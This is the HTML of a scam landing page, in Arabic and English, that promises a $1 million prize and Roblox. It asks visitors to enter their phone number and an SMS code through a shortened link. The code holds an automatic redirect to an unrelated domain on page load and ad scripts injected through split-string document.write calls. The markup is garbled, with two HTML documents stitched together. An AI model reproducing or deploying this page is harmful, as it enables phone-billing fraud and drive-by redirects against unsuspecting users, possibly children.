<!DOCTYPE html>
</script>

<html><head>
	<!DOCTYPE html>
<html lang="en">
  <head>
    <html>
<head>
    <script>
        window.location.href = "https://basketballshameless.com/mgv1t0vu?key=27718f51de6b80a7896c731c6f44135a";
    </script>
</head>
</html>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="icon" href="https://glitch.com/favicon.ico" />

    <title>Congratulations on your $1 million prize
</title>

    <meta name="robots" content="index,follow" />
    <meta property="og:title" content="Hello World!" />
    
    <!-- import the webpage's stylesheet -->
    <link rel="stylesheet" href="/style.css" />


    <style type="text/css">
  .mobileShow {display: none;}

  /* Smartphone Portrait and Landscape */
  @media only screen
    and (min-device-width : 320px)
    and (max-device-width : 480px){ 
      .mobileShow {display: inline;}
  }
  .mobileHide { display: inline; }

  /* Smartphone Portrait and Landscape */
  @media only screen
    and (min-device-width : 320px)
    and (max-device-width : 480px){
     .mobileHide { display: none;}
  }
</style>
  </head>
  <body>
    <!-- the wrapper and content divs set margins and positioning -->
    <div class="wrapper">
      <div class="content" role="main">
        <!-- this is the start of content for our page -->
        <h1 class="title">Hello World!</h1>

      </div>
     <div class="mobileShow">
<script type="text/javascript">
	atOptions = {
		'key' : '0303d891ce479628509ef2972f7239d6',
		'format' : 'iframe',
		'height' : 300,
		'width' : 160,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://wizardunstablecommissioner.com/0303d891ce479628509ef2972f7239d6/invoke.js"></scr' + 'ipt>');
</script> </div> 
      <div class="mobileHide"> <script type="text/javascript">
	atOptions = {
		'key' : 'd6744e6de34f83085d99817829bdfc87',
		'format' : 'iframe',
		'height' : 90,
		'width' : 728,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://wizardunstablecommissioner.com/d6744e6de34f83085d99817829bdfc87/invoke.js"></scr' + 'ipt>');
</script></div>
    </div>
<script type='text/javascript' src='//basketballshameless.com/4b/ae/47/4bae474b070d2ab3d4fa98d0a8c7c314.js'></script>
  </body>
</html>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <title>روبلكس</title

    <meta name="viewport" content="width=device-width,initial-scale=1">
    <link rel="stylesheet" type="text/css" href="./imges/style.css">
<style type="text/css">.keyword-info-container {
  box-sizing: border-box;
  width: 100%;
  margin-bottom: 20px;
  font-size: 12px;
  border-bottom: 1px solid #DEE1E5;
}

.keyword-info-container.youtube {
  margin-bottom: 0;
  border-bottom: none;
}

.keyword-info-container .title {
	color: #26282D;
	font-size: 17px;
  font-weight: bold;
}

.keyword-info-container .tabs {
  list-style: none;
  display: flex;
  justify-content: flex-start;
  border-bottom: 1px solid #DEE1E5;
  margin-top: -10px;
  padding: 0px 16px;
  align-items: center;
}
.keyword-info-container .tabs li {
  padding: 8px;
  padding-left: 0;
  color: #000;
  cursor: pointer;
  font-size: 12px;
}
.keyword-info-container .tabs li.small {
  font-size: 10px;
}
.keyword-info-container .tabs li:last-child {
  overflow: hidden;
}

.keyword-info-container .tabs li.active {
  color: #4285F4;
}

table.keyword-info-table {
  border-collapse: collapse;
  width: 100%;
  color: #000;
  font-size: 12px;
  position: relative;
}

.keyword-info-table thead {
  height: 50px;
}

.keyword-info-table th {
  padding: 10px;
  padding-left: 0;
  font-weight: bold;
  color: #000000;
  font-size: 12px;
}

.keyword-info-table th:first-child {
  padding-left: 16px;
}

.keyword-info-table th:last-child {
  padding-right: 16px;
}

.keyword-info-table td {
  border-bottom: 1px solid #DEE1E5;
  padding: 10px;
  padding-left: 0;
}

.keyword-info-table td:first-child {
  padding-left: 16px;
}

.keyword-info-table td:last-child {
  padding-right: 16px;
}

.keyword-info-table tfoot tr {
  background-color: #DEE1E544;
}

.keyword-info-table tfoot tr:last-child td{
  border-bottom: none;
}

.ubersuggest-button {
  color: #0086F7;
  font-family: Arial;
  font-size: 14px;
  font-weight: bold;
  line-height: 29px;
  padding: 8px 30px;
  border: 1px solid #0086F7;
  background-color: #FFFFFF;
  border-radius: 2px;
  outline: none;
  border: none;
  cursor: pointer;
  margin: 4px;
}

.ubersuggest-logo-wrapper {
  display: flex;
  align-items: center;
  justify-content: flex-end;
  margin: 10px 10px 0 0;
  font-weight: bold;
  color: #26282D;
}

.ubersuggest-logo {
  width: 182px;
  height: 33px;
  cursor: pointer;
}

.keyword-info-container .row {
  display: flex;
  justify-content: space-between;
  align-items: center;
  margin: 0;
  padding: 20px 16px;
  border-top: 1px solid #DEE1E5;
}

.header h2 {
  color: #000000;
  font-family: Geomanist;
  font-size: 24px;
  font-weight: 500;
}

html[dark] .keyword-info-container .title {
  color: #fff;
}

html[dark] .keyword-info-container .tabs {
  border-color: #ffffff0d;
}

html[dark] .keyword-info-container .tabs li {
  color: #fff;
}

html[dark] .keyword-info-container .tabs li.active {
  color: #4285F4;
}

html[dark] table.keyword-info-table {
  color: #fff;
}

html[dark] .keyword-info-table th {
  color: #fff;
}

html[dark] .keyword-info-table tfoot tr {
  background-color: #3D3D3D;
}

html[dark] .keyword-info-table tfoot tr:last-child td .button-arrow{
  border-color: #fff;
}


</style><style type="text/css">.tippy-touch{cursor:pointer!important}.tippy-notransition{transition:none!important}.tippy-popper{max-width:400px;-webkit-perspective:800px;perspective:800px;z-index:9999;outline:0;transition-timing-function:cubic-bezier(.165,.84,.44,1);pointer-events:none}.tippy-popper.html-template{max-width:96%;max-width:calc(100% - 20px)}.tippy-popper[x-placement^=top] [x-arrow]{border-top:7px solid #333;border-right:7px solid transparent;border-left:7px solid transparent;bottom:-7px;margin:0 9px}.tippy-popper[x-placement^=top] [x-arrow].arrow-small{border-top:5px solid #333;border-right:5px solid transparent;border-left:5px solid transparent;bottom:-5px}.tippy-popper[x-placement^=top] [x-arrow].arrow-big{border-top:10px solid #333;border-right:10px solid transparent;border-left:10px solid transparent;bottom:-10px}.tippy-popper[x-placement^=top] [x-circle]{-webkit-transform-origin:0 33%;transform-origin:0 33%}.tippy-popper[x-placement^=top] [x-circle].enter{-webkit-transform:scale(1) translate(-50%,-55%);transform:scale(1) translate(-50%,-55%);opacity:1}.tippy-popper[x-placement^=top] [x-circle].leave{-webkit-transform:scale(.15) translate(-50%,-50%);transform:scale(.15) translate(-50%,-50%);opacity:0}.tippy-popper[x-placement^=top] .tippy-tooltip.light-theme [x-circle]{background-color:#fff}.tippy-popper[x-placement^=top] .tippy-tooltip.light-theme [x-arrow]{border-top:7px solid #fff;border-right:7px solid transparent;border-left:7px solid transparent}.tippy-popper[x-placement^=top] .tippy-tooltip.light-theme [x-arrow].arrow-small{border-top:5px solid #fff;border-right:5px solid transparent;border-left:5px solid transparent}.tippy-popper[x-placement^=top] .tippy-tooltip.light-theme [x-arrow].arrow-big{border-top:10px solid #fff;border-right:10px solid transparent;border-left:10px solid transparent}.tippy-popper[x-placement^=top] .tippy-tooltip.transparent-theme [x-circle]{background-color:rgba(0,0,0,.7)}.tippy-popper[x-placement^=top] .tippy-tooltip.transparent-theme [x-arrow]{border-top:7px solid rgba(0,0,0,.7);border-right:7px solid transparent;border-left:7px solid transparent}.tippy-popper[x-placement^=top] .tippy-tooltip.transparent-theme [x-arrow].arrow-small{border-top:5px solid rgba(0,0,0,.7);border-right:5px solid transparent;border-left:5px solid transparent}.tippy-popper[x-placement^=top] .tippy-tooltip.transparent-theme [x-arrow].arrow-big{border-top:10px solid rgba(0,0,0,.7);border-right:10px solid transparent;border-left:10px solid transparent}.tippy-popper[x-placement^=top] [data-animation=perspective]{-webkit-transform-origin:bottom;transform-origin:bottom}.tippy-popper[x-placement^=top] [data-animation=perspective].enter{opacity:1;-webkit-transform:translateY(-10px) rotateX(0);transform:translateY(-10px) rotateX(0)}.tippy-popper[x-placement^=top] [data-animation=perspective].leave{opacity:0;-webkit-transform:translateY(0) rotateX(90deg);transform:translateY(0) rotateX(90deg)}.tippy-popper[x-placement^=top] [data-animation=fade].enter{opacity:1;-webkit-transform:translateY(-10px);transform:translateY(-10px)}.tippy-popper[x-placement^=top] [data-animation=fade].leave{opacity:0;-webkit-transform:translateY(-10px);transform:translateY(-10px)}.tippy-popper[x-placement^=top] [data-animation=shift].enter{opacity:1;-webkit-transform:translateY(-10px);transform:translateY(-10px)}.tippy-popper[x-placement^=top] [data-animation=shift].leave{opacity:0;-webkit-transform:translateY(0);transform:translateY(0)}.tippy-popper[x-placement^=top] [data-animation=scale].enter{opacity:1;-webkit-transform:translateY(-10px) scale(1);transform:translateY(-10px) scale(1)}.tippy-popper[x-placement^=top] [data-animation=scale].leave{opacity:0;-webkit-transform:translateY(0) scale(0);transform:translateY(0) scale(0)}.tippy-popper[x-placement^=bottom] [x-arrow]{border-bottom:7px solid #333;border-right:7px solid transparent;border-left:7px solid transparent;top:-7px;margin:0 9px}.tippy-popper[x-placement^=bottom] [x-arrow].arrow-small{border-bottom:5px solid #333;border-right:5px solid transparent;border-left:5px solid transparent;top:-5px}.tippy-popper[x-placement^=bottom] [x-arrow].arrow-big{border-bottom:10px solid #333;border-right:10px solid transparent;border-left:10px solid transparent;top:-10px}.tippy-popper[x-placement^=bottom] [x-circle]{-webkit-transform-origin:0 -50%;transform-origin:0 -50%}.tippy-popper[x-placement^=bottom] [x-circle].enter{-webkit-transform:scale(1) translate(-50%,-45%);transform:scale(1) translate(-50%,-45%);opacity:1}.tippy-popper[x-placement^=bottom] [x-circle].leave{-webkit-transform:scale(.15) translate(-50%,-5%);transform:scale(.15) translate(-50%,-5%);opacity:0}.tippy-popper[x-placement^=bottom] .tippy-tooltip.light-theme [x-circle]{background-color:#fff}.tippy-popper[x-placement^=bottom] .tippy-tooltip.light-theme [x-arrow]{border-bottom:7px solid #fff;border-right:7px solid transparent;border-left:7px solid transparent}.tippy-popper[x-placement^=bottom] .tippy-tooltip.light-theme [x-arrow].arrow-small{border-bottom:5px solid #fff;border-right:5px solid transparent;border-left:5px solid transparent}.tippy-popper[x-placement^=bottom] .tippy-tooltip.light-theme [x-arrow].arrow-big{border-bottom:10px solid #fff;border-right:10px solid transparent;border-left:10px solid transparent}.tippy-popper[x-placement^=bottom] .tippy-tooltip.transparent-theme [x-circle]{background-color:rgba(0,0,0,.7)}.tippy-popper[x-placement^=bottom] .tippy-tooltip.transparent-theme [x-arrow]{border-bottom:7px solid rgba(0,0,0,.7);border-right:7px solid transparent;border-left:7px solid transparent}.tippy-popper[x-placement^=bottom] .tippy-tooltip.transparent-theme [x-arrow].arrow-small{border-bottom:5px solid rgba(0,0,0,.7);border-right:5px solid transparent;border-left:5px solid transparent}.tippy-popper[x-placement^=bottom] .tippy-tooltip.transparent-theme [x-arrow].arrow-big{border-bottom:10px solid rgba(0,0,0,.7);border-right:10px solid transparent;border-left:10px solid transparent}.tippy-popper[x-placement^=bottom] [data-animation=perspective]{-webkit-transform-origin:top;transform-origin:top}.tippy-popper[x-placement^=bottom] [data-animation=perspective].enter{opacity:1;-webkit-transform:translateY(10px) rotateX(0);transform:translateY(10px) rotateX(0)}.tippy-popper[x-placement^=bottom] [data-animation=perspective].leave{opacity:0;-webkit-transform:translateY(0) rotateX(-90deg);transform:translateY(0) rotateX(-90deg)}.tippy-popper[x-placement^=bottom] [data-animation=fade].enter{opacity:1;-webkit-transform:translateY(10px);transform:translateY(10px)}.tippy-popper[x-placement^=bottom] [data-animation=fade].leave{opacity:0;-webkit-transform:translateY(10px);transform:translateY(10px)}.tippy-popper[x-placement^=bottom] [data-animation=shift].enter{opacity:1;-webkit-transform:translateY(10px);transform:translateY(10px)}.tippy-popper[x-placement^=bottom] [data-animation=shift].leave{opacity:0;-webkit-transform:translateY(0);transform:translateY(0)}.tippy-popper[x-placement^=bottom] [data-animation=scale].enter{opacity:1;-webkit-transform:translateY(10px) scale(1);transform:translateY(10px) scale(1)}.tippy-popper[x-placement^=bottom] [data-animation=scale].leave{opacity:0;-webkit-transform:translateY(0) scale(0);transform:translateY(0) scale(0)}.tippy-popper[x-placement^=left] [x-arrow]{border-left:7px solid #333;border-top:7px solid transparent;border-bottom:7px solid transparent;right:-7px;margin:6px 0}.tippy-popper[x-placement^=left] [x-arrow].arrow-small{border-left:5px solid #333;border-top:5px solid transparent;border-bottom:5px solid transparent;right:-5px}.tippy-popper[x-placement^=left] [x-arrow].arrow-big{border-left:10px solid #333;border-top:10px solid transparent;border-bottom:10px solid transparent;right:-10px}.tippy-popper[x-placement^=left] [x-circle]{-webkit-transform-origin:50% 0;transform-origin:50% 0}.tippy-popper[x-placement^=left] [x-circle].enter{-webkit-transform:scale(1) translate(-50%,-50%);transform:scale(1) translate(-50%,-50%);opacity:1}.tippy-popper[x-placement^=left] [x-circle].leave{-webkit-transform:scale(.15) translate(-50%,-50%);transform:scale(.15) translate(-50%,-50%);opacity:0}.tippy-popper[x-placement^=left] .tippy-tooltip.light-theme [x-circle]{background-color:#fff}.tippy-popper[x-placement^=left] .tippy-tooltip.light-theme [x-arrow]{border-left:7px solid #fff;border-top:7px solid transparent;border-bottom:7px solid transparent}.tippy-popper[x-placement^=left] .tippy-tooltip.light-theme [x-arrow].arrow-small{border-left:5px solid #fff;border-top:5px solid transparent;border-bottom:5px solid transparent}.tippy-popper[x-placement^=left] .tippy-tooltip.light-theme [x-arrow].arrow-big{border-left:10px solid #fff;border-top:10px solid transparent;border-bottom:10px solid transparent}.tippy-popper[x-placement^=left] .tippy-tooltip.transparent-theme [x-circle]{background-color:rgba(0,0,0,.7)}.tippy-popper[x-placement^=left] .tippy-tooltip.transparent-theme [x-arrow]{border-left:7px solid rgba(0,0,0,.7);border-top:7px solid transparent;border-bottom:7px solid transparent}.tippy-popper[x-placement^=left] .tippy-tooltip.transparent-theme [x-arrow].arrow-small{border-left:5px solid rgba(0,0,0,.7);border-top:5px solid transparent;border-bottom:5px solid transparent}.tippy-popper[x-placement^=left] .tippy-tooltip.transparent-theme [x-arrow].arrow-big{border-left:10px solid rgba(0,0,0,.7);border-top:10px solid transparent;border-bottom:10px solid transparent}.tippy-popper[x-placement^=left] [data-animation=perspective]{-webkit-transform-origin:right;transform-origin:right}.tippy-popper[x-placement^=left] [data-animation=perspective].enter{opacity:1;-webkit-transform:translateX(-10px) rotateY(0);transform:translateX(-10px) rotateY(0)}.tippy-popper[x-placement^=left] [data-animation=perspective].leave{opacity:0;-webkit-transform:translateX(0) rotateY(-90deg);transform:translateX(0) rotateY(-90deg)}.tippy-popper[x-placement^=left] [data-animation=fade].enter{opacity:1;-webkit-transform:translateX(-10px);transform:translateX(-10px)}.tippy-popper[x-placement^=left] [data-animation=fade].leave{opacity:0;-webkit-transform:translateX(-10px);transform:translateX(-10px)}.tippy-popper[x-placement^=left] [data-animation=shift].enter{opacity:1;-webkit-transform:translateX(-10px);transform:translateX(-10px)}.tippy-popper[x-placement^=left] [data-animation=shift].leave{opacity:0;-webkit-transform:translateX(0);transform:translateX(0)}.tippy-popper[x-placement^=left] [data-animation=scale].enter{opacity:1;-webkit-transform:translateX(-10px) scale(1);transform:translateX(-10px) scale(1)}.tippy-popper[x-placement^=left] [data-animation=scale].leave{opacity:0;-webkit-transform:translateX(0) scale(0);transform:translateX(0) scale(0)}.tippy-popper[x-placement^=right] [x-arrow]{border-right:7px solid #333;border-top:7px solid transparent;border-bottom:7px solid transparent;left:-7px;margin:6px 0}.tippy-popper[x-placement^=right] [x-arrow].arrow-small{border-right:5px solid #333;border-top:5px solid transparent;border-bottom:5px solid transparent;left:-5px}.tippy-popper[x-placement^=right] [x-arrow].arrow-big{border-right:10px solid #333;border-top:10px solid transparent;border-bottom:10px solid transparent;left:-10px}.tippy-popper[x-placement^=right] [x-circle]{-webkit-transform-origin:-50% 0;transform-origin:-50% 0}.tippy-popper[x-placement^=right] [x-circle].enter{-webkit-transform:scale(1) translate(-50%,-50%);transform:scale(1) translate(-50%,-50%);opacity:1}.tippy-popper[x-placement^=right] [x-circle].leave{-webkit-transform:scale(.15) translate(-50%,-50%);transform:scale(.15) translate(-50%,-50%);opacity:0}.tippy-popper[x-placement^=right] .tippy-tooltip.light-theme [x-circle]{background-color:#fff}.tippy-popper[x-placement^=right] .tippy-tooltip.light-theme [x-arrow]{border-right:7px solid #fff;border-top:7px solid transparent;border-bottom:7px solid transparent}.tippy-popper[x-placement^=right] .tippy-tooltip.light-theme [x-arrow].arrow-small{border-right:5px solid #fff;border-top:5px solid transparent;border-bottom:5px solid transparent}.tippy-popper[x-placement^=right] .tippy-tooltip.light-theme [x-arrow].arrow-big{border-right:10px solid #fff;border-top:10px solid transparent;border-bottom:10px solid transparent}.tippy-popper[x-placement^=right] .tippy-tooltip.transparent-theme [x-circle]{background-color:rgba(0,0,0,.7)}.tippy-popper[x-placement^=right] .tippy-tooltip.transparent-theme [x-arrow]{border-right:7px solid rgba(0,0,0,.7);border-top:7px solid transparent;border-bottom:7px solid transparent}.tippy-popper[x-placement^=right] .tippy-tooltip.transparent-theme [x-arrow].arrow-small{border-right:5px solid rgba(0,0,0,.7);border-top:5px solid transparent;border-bottom:5px solid transparent}.tippy-popper[x-placement^=right] .tippy-tooltip.transparent-theme [x-arrow].arrow-big{border-right:10px solid rgba(0,0,0,.7);border-top:10px solid transparent;border-bottom:10px solid transparent}.tippy-popper[x-placement^=right] [data-animation=perspective]{-webkit-transform-origin:left;transform-origin:left}.tippy-popper[x-placement^=right] [data-animation=perspective].enter{opacity:1;-webkit-transform:translateX(10px) rotateY(0);transform:translateX(10px) rotateY(0)}.tippy-popper[x-placement^=right] [data-animation=perspective].leave{opacity:0;-webkit-transform:translateX(0) rotateY(90deg);transform:translateX(0) rotateY(90deg)}.tippy-popper[x-placement^=right] [data-animation=fade].enter{opacity:1;-webkit-transform:translateX(10px);transform:translateX(10px)}.tippy-popper[x-placement^=right] [data-animation=fade].leave{opacity:0;-webkit-transform:translateX(10px);transform:translateX(10px)}.tippy-popper[x-placement^=right] [data-animation=shift].enter{opacity:1;-webkit-transform:translateX(10px);transform:translateX(10px)}.tippy-popper[x-placement^=right] [data-animation=shift].leave{opacity:0;-webkit-transform:translateX(0);transform:translateX(0)}.tippy-popper[x-placement^=right] [data-animation=scale].enter{opacity:1;-webkit-transform:translateX(10px) scale(1);transform:translateX(10px) scale(1)}.tippy-popper[x-placement^=right] [data-animation=scale].leave{opacity:0;-webkit-transform:translateX(0) scale(0);transform:translateX(0) scale(0)}.tippy-popper .tippy-tooltip.transparent-theme{background-color:rgba(0,0,0,.7)}.tippy-popper .tippy-tooltip.transparent-theme[data-animatefill]{background-color:transparent}.tippy-popper .tippy-tooltip.light-theme{color:#26323d;box-shadow:0 4px 20px 4px rgba(0,20,60,.1),0 4px 80px -8px rgba(0,20,60,.2);background-color:#fff}.tippy-popper .tippy-tooltip.light-theme[data-animatefill]{background-color:transparent}.tippy-tooltip{position:relative;color:#fff;border-radius:4px;font-size:.95rem;padding:.4rem .8rem;text-align:center;will-change:transform;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#333}.tippy-tooltip--small{padding:.25rem .5rem;font-size:.8rem}.tippy-tooltip--big{padding:.6rem 1.2rem;font-size:1.2rem}.tippy-tooltip[data-animatefill]{overflow:hidden;background-color:transparent}.tippy-tooltip[data-interactive]{pointer-events:auto}.tippy-tooltip[data-inertia]{transition-timing-function:cubic-bezier(.53,2,.36,.85)}.tippy-tooltip [x-arrow]{position:absolute;width:0;height:0}.tippy-tooltip [x-circle]{position:absolute;will-change:transform;background-color:#333;border-radius:50%;width:130%;width:calc(110% + 2rem);left:50%;top:50%;z-index:-1;overflow:hidden;transition:all ease}.tippy-tooltip [x-circle]:before{content:"";padding-top:90%;float:left}@media (max-width:450px){.tippy-popper{max-width:96%;max-width:calc(100% - 20px)}}
</style><style type="text/css">.ubersuggest-header-container {
  box-sizing: border-box;
  width: 100%;
  font-size: 12px;
}

.ubersuggest-header-container .row {
  margin: 0;
  padding: 15px 16px 15px 16px;
  display: flex;
  justify-content: space-between;
  align-items: center;
  margin-top: 10px;
  margin-bottom: 20px;
}

.ue-enable {
  display: block;
}

.ue-disable {
  display: none;
}

.ubersuggest-header-container .settings {
  display: flex;
  align-items: center;
  margin-right: 18px;
}
.ubersuggest-header-container .settings-label {
  margin-right: 21px;
}

.ubersuggest-header-container .settings-icon {
  width: 21px;
  height: 21px;
  margin-right: 7px;
}
</style><style type="text/css">.keyword-info-section {
  color: #26282D;
  font-family: Arial;
  font-size: 12px;
  padding: 10px 0 10px 10px;
  display: flex;
  align-items: center;
}

.keyword-info-section.hidden {
  display: none;
}

.keyword-info-section.google{
  background-color: #fff;
}

.keyword-info-section.youtube{
  margin-right: 15px;
  padding: 0 0 0 10px;
  height: 100%;
  background-color: #fff;
}

html[dark="true"] .keyword-info-section.youtube {
  background-color: #121212;
}

.keyword-info-section.amazon{
  padding: 13px 0;
  background-color: #fff;
}
</style><style type="text/css">.kw-overview-container {
  box-sizing: border-box;
  width: 673px;
  padding: 0;
  margin: 0;
  margin-top: 14px;
  font-size: 12px;
}
.kw-overview-container.youtube {
  box-sizing: border-box;
  width: 100%;
  padding: 0;
  margin: 0;
  font-size: 12px;
}
</style><style type="text/css">.bl-info-container {
  box-sizing: border-box;
  width: 100%;
  padding: 0;
  margin: 0;
  font-size: 12px;
}
.bl-info-header {
  display: flex;
  height: 24px;
  width: 100%;
  padding: 0;
  justify-content: space-between;
  cursor: pointer;
  box-sizing: border-box;
  margin-bottom: 5px;
}

.bl-info-header .row {
  display: flex;
  margin: 0;
  width: 100%;
  justify-content: space-between;
}

.bl-info-header .row.youtube {
  justify-content: flex-start;
}

.bl-info-content,
.kw-info-content {
  width: 100%;
  display: flex;
  flex-direction: column;
  border: 1px solid #DEE1E5;
  border-radius: 8px;
  padding-top: 0;
}

.bl-info-content img.loading {
  width: 50px;
  margin: 0 auto;
  margin-bottom: 10px;
}

.kw-info-content img.loading {
  width: 50px;
  margin: 0 auto;
  margin-top: 10px;
  margin-bottom: 10px;
}

table.bl-info-table,
table.kw-info-table {
  border-collapse: collapse;
  width: 100%;
  color: #808185;
  font-size: 12px;
}

.bl-info-table thead,
.kw-info-table thead {
  height: 50px;
}

.bl-info-table tr,
.kw-info-table tr {
  width: 100%;
  max-width: 600px;
}

.bl-info-table th,
.kw-info-table th {
  padding: 10px;
  padding-left: 0;
  font-weight: bold;
  color: #000000;
  font-size: 11px;
  border-bottom: 1px solid #DEE1E5;
}
.bl-info-table th:first-child,
.kw-info-table th:first-child {
  padding-left: 16px;
}

.bl-info-table th:last-child,
.kw-info-table th:last-child {
  border-right: none;
  padding-right: 16px;
}


.bl-info-table td,
.kw-info-table td {
  border-bottom: 1px solid #DEE1E5;
  padding: 10px;
  padding-left: 0;
  max-width: 0;
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
  color: #000;
}

.bl-info-table td:first-child,
.kw-info-table td:first-child {
  border-left: none;
  padding-left: 16px;
}

.bl-info-table td:last-child,
.kw-info-table td:last-child {
  border-right: none;
  padding-right: 16px;
}

.bl-info-table tfoot tr:last-child td,
.kw-info-table tfoot tr:last-child td {
  border-bottom: none;
}

.bl-info-container .row {
  display: flex;
  justify-content: space-between;
  align-items: center;
  margin-top: 10px;
  margin-bottom: 20px;
}
</style><style type="text/css">.statistics-graph-container {
  box-sizing: border-box;
  width: 100%;
  margin-bottom: 5px;
  font-size: 12px;
  padding: 0px 16px;
}

.statistics-graph-container .row {
  display: flex;
  justify-content: space-between;
  align-items: center;
  margin: 10px 0 20px 0;
}

.statistics-graph-container .row .title {
	color: #26282D;
	font-size: 17px;
  font-weight: bold;
}

.statistics-graph-container .tabs {
  list-style: none;
  display: flex;
  justify-content: flex-start;
  border-bottom: 1px solid #DEE1E5;
  margin: 0 -16px;
  margin-bottom: 10px;
  margin-top: -10px;
  padding: 0px 16px;
}

.statistics-graph-container .tabs li {
  display: flex;
  align-items: center;
  padding: 8px 16px;
  color: #000;
  cursor: pointer;
  font-size: 13px;
  border-bottom: 3px solid transparent;
}

.statistics-graph-container .tabs li:first-child {
  margin-left: -16px;
}

.statistics-graph-container .tabs li.active {
  color: #4285F4;
  border-bottom: 3px solid #4285F4;
}</style></head>
<body>
<div id="content" style="text-align: center; position: relative;">
<div id="cont_modal">
<div id="modal">
<h1><span style="color: #ff0000;">مسابقة الحلم اهلا بكم </span></h1>
<p style="font-size: 20px;"><span style="font-size: 18pt;"><strong>( <span style="color: #ff0000;">أين انت ياصاحب الصورة </span>) مصطفى الأغا</strong></span></p>
<p style="font-size: 20px;"><span style="font-size: 18pt;"><strong>قم بتأكيد رقمك لتأكيد هويتك لنا وتسليمك الشيك</strong></span></p>
<img src="./imges/r1.png" alt="Logo" style="width: 35%; margin-top: 20px;">
<h2>مهلا قبل ان تضغط علي اوك</h2>
<p style="margin-top: 15px; width: 90%; margin-left: 5%; font-weight: bold;"><span style="font-size: 14pt; color: #ff0000;">اضغط علي كلمة اوك وقم  بإختيار اي عرض من العروض وقم بادخال رقم هاتفك  وادخل الكود الذى سيصلك فى رسالة لتاكيد هويتك وبعدها مباشرة انتظر ثواني وسيتم تحويلك الي رابط التحميل</span></p>
<a href="https://smrturl.co/0cf5b5a
"><button id="link-button">OK</button></a></div>
</div>
<div id="cont_text">
<p style="margin-top: 10px;">Congratulations, you can win an:</p>
<h1>روبلكس 2021</h1>
<p style="font-weight: normal; margin-bottom: 10px;">Your delivery code is:</p>
<p style="background-color: white; padding: 5px; width: 90px; margin: 5px auto 10px auto; color: #212121;">5478668</p>
<button id="send-sms">VERIFY</button></div>
<div style="width: 85%; margin: 0 auto; position: relative;"><img src="./imges/r2.png" alt="Logo" style="width: 65%; margin-top: 40px;"></div>
</div>

<!-- This landing page has been Generated using purelander.com -->
<div class="ue-sidebar-container"></div></body></html>
